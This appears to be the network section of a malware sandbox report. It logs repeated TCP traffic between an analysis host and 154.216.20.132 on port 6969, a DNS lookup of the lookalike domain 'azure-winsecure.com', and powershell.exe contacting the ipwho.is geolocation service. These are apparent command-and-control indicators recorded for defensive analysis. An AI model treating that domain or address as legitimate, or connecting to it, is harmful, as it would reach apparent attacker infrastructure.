                                          Oct 3, 2024 14:55:08.335963964 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.729193926 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.887242079 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.887494087 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.916820049 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.921653032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.922154903 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.927035093 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.293159962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.405188084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.457139015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.511605978 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745608091 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745701075 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745768070 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.750551939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750634909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750667095 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750694990 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750725985 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750845909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750942945 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750971079 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.751000881 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.751040936 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755343914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755454063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755510092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755538940 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755567074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755594969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755644083 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755671024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755697966 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755723953 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755750895 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755775928 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755810022 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755841970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.987732887 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.148695946 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.148861885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.178965092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.179050922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.183988094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184017897 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184022903 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184031963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184149981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.404501915 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.511583090 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.559418917 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.593324900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.593408108 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.598407984 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598428011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598433018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598443031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.928293943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.090528011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.436966896 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.437177896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.442025900 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.815601110 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.870929956 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.966012001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.993632078 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:31.999042034 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:31.999175072 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.004306078 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.531357050 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.532365084 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.532469988 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.555737019 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.562886953 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.562962055 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:32.569912910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.933862925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:32.980361938 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.106714964 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.133718967 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.138793945 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.138885021 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.143733978 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.510885954 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.558501005 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.684617996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.730470896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.730470896 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.730504036 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.735420942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735472918 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735486031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.735577106 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:33.735624075 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.740505934 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.740559101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:33.973261118 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.027358055 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.122256994 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.151256084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.151256084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.156229019 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.156286001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.156402111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.378336906 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.433420897 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.530323982 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.555902958 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.560707092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.560756922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:34.565566063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.943636894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:34.995948076 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.106923103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.134718895 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.139614105 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.139700890 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.144634008 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.517231941 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.558692932 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.668900967 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.697374105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.702502012 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:35.702589035 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:35.707375050 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.074016094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.120951891 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.231549025 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.260601997 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.265521049 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.265634060 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.270450115 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.638216972 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.683558941 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.793958902 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.820868015 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.825834990 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:36.825901031 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:36.832197905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.248059988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.292885065 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.403556108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.430474043 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.435559988 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.435636044 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.440450907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.819128036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:37.870976925 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:37.981472015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.009037018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.015697002 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.015795946 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.021684885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.396416903 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.449153900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.571841955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.602292061 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.611259937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.611390114 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:38.620629072 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:38.990277052 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.042867899 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.169641018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.197402000 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.202505112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.202594995 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.207422018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.601067066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.652200937 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.782212973 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:39.829096079 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.913870096 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:39.913943052 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.104341030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.104454994 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105720043 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105794907 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105895996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105910063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.105942011 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.105957985 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.106062889 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.106106043 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.112087011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112406969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112421036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.112433910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.441909075 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.496079922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.622070074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.652365923 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.652401924 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:40.662141085 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.662822962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:40.665744066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.058305979 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.105386972 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.200294018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.244218111 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.249239922 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.249336004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.254640102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.641037941 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.683491945 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.812910080 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.840970039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.859203100 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:41.859306097 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:41.868592024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.269289970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.324213028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.388667107 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.433604002 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.440294027 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.473388910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.473615885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.503029108 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.855595112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:42.902178049 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:42.998545885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.042850018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.045347929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.066911936 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.066979885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.101300001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.440687895 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.496021032 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.593276024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.623800993 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.629549026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.629637957 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:43.634706020 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:43.995143890 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.042821884 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.194350958 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.234638929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.252012014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.252089024 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.257319927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.643124104 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.683569908 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.949554920 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.953795910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:44.953867912 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.978641987 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:44.978717089 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.017189980 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.017255068 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.017286062 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.019164085 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.261955023 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.308576107 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.423585892 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.451107979 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.452374935 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.463459969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468787909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468862057 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.468868971 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.685282946 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.730379105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.869474888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.917813063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.938278913 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.938359022 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.948208094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948234081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948246956 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948342085 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:45.948646069 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.948659897 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964231014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964247942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:45.964260101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.201332092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.245939016 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.357914925 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.402251005 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.408842087 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.408893108 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.413886070 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.413966894 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.414000034 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.659912109 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.714776039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.796941042 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.839806080 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.846767902 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.851802111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:46.852567911 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:46.857553005 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.217989922 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.261593103 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.372720957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.417809963 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.418920994 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.423901081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.423995018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.428976059 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.791979074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.839696884 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:47.955009937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:47.995927095 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:12.964704037 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:12.969806910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.436321974 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.441572905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.441646099 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.446588993 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.828397036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:14.870960951 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:14.982551098 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.023154974 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:15.028198957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.028291941 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:56:15.033253908 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578025103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578609943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:56:15.578682899 CEST591726969192.168.2.6154.216.20.132
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Oct 3, 2024 14:54:25.659888983 CEST | 53 | 50814 | 162.159.36.2 | 192.168.2.6
                                           Oct 3, 2024 14:54:26.514218092 CEST | 53 | 57939 | 1.1.1.1 | 192.168.2.6
                                           Oct 3, 2024 14:54:44.148282051 CEST | 49899 | 53 | 192.168.2.6 | 1.1.1.1
                                           Oct 3, 2024 14:54:44.368469954 CEST | 53 | 49899 | 1.1.1.1 | 192.168.2.6
                                           Oct 3, 2024 14:54:46.423022985 CEST | 51367 | 53 | 192.168.2.6 | 1.1.1.1
                                           Oct 3, 2024 14:54:46.429874897 CEST | 53 | 51367 | 1.1.1.1 | 192.168.2.6
                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                           Oct 3, 2024 14:54:44.148282051 CEST | 192.168.2.6 | 1.1.1.1 | 0x1b3b | Standard query (0) | azure-winsecure.com | A (IP address) | IN (0x0001) | false
                                           Oct 3, 2024 14:54:46.423022985 CEST | 192.168.2.6 | 1.1.1.1 | 0xd10f | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 3, 2024 14:54:44.368469954 CEST1.1.1.1192.168.2.60x1b3bNo error (0)azure-winsecure.com154.216.20.132A (IP address)IN (0x0001)false
                                          Oct 3, 2024 14:54:46.429874897 CEST1.1.1.1192.168.2.60xd10fNo error (0)ipwho.is147.135.36.89A (IP address)IN (0x0001)false
• ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 59173 | 147.135.36.89 | 443 | 7088 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
